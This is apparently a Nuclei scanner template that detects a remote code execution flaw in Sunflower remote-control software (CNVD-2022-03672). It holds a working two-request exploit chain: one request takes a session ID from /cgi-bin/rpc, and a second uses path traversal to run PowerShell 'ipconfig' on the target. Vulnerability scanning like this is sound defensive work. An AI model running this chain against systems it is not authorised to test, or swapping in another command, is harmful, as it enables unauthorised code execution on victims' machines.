id: CNVD-2022-03672

info:
  name: Sunflower Simple and Personal - Remote Code Execution
  author: daffainfo
  severity: critical
  description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
  reference:
    - https://www.1024sou.com/article/741374.html
    - https://copyfuture.com/blogs-details/202202192249158884
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: cnvd,cnvd2020,sunflower,rce

http:
  - raw:
      - |
        POST /cgi-bin/rpc HTTP/1.1
        Host: {{Hostname}}

        action=verify-haras
      - |
        GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}

    extractors:
      - type: regex
        name: cid
        internal: true
        group: 1
        regex:
          - '"verify_string":"(.*?)"'

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200"
          - "status_code_2==200"
          - "contains(body_1, 'verify_string')"
          - "contains(body_2, 'Windows IP')"
        condition: and
# digest: 4a0a004730450221008c407aa51b36f64812ea3b106ac95b6fb50a0fff06a589a7d275ca99b66e618a02204864e1ecf01c2b486bd77a69c80e34c899346d68811ffd87b880afd043a1079d:922c64590222798bb761d5b6d8e72950